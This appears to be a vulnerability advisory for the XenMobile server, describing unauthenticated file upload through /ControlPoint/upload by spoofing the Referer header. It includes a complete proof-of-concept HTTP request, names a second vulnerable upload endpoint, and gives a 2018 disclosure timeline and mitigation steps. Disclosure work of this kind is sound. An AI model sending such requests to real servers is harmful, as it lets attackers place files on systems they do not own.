It is possible to upload a file to to the Xen Mobile server without authentication by making a request to /ControlPoint/upload that includes a Referer header claiming that the request was referred from the application’s domain.

POST /ControlPoint/upload HTTP/1.1
Host: xenmobile.example.com
Referer: https://xenmobile.example.com/index_uc.html
Content-Type: multipart/form-data; boundary=MultipartBoundry
Connection: close
Content-Length: 239

--MultipartBoundry
Content-Disposition: form-data; name="image"; filename="FILENAME_HERE"

[content of file]
--MultipartBoundry--

There are several other API endpoints that also provide this file upload functionality without authentication. For example, the /zdm/rs/xdmServices/devicepolicy/fileUpload accepts JSON data and writes it to files under /opt/sas/temp/. This functionality chooses a random filename, but then discloses that filename to the caller.

2018-03-28 – Reported to Citrix and acknowledged immediately

2018-05-21 – Issue reported fixed

1. Remove public access to this service by moving it inside your network and configuring mobile devices to access it via a VPN or proxy that requires authentication
2. Install an update rectifying this issue as soon as one is available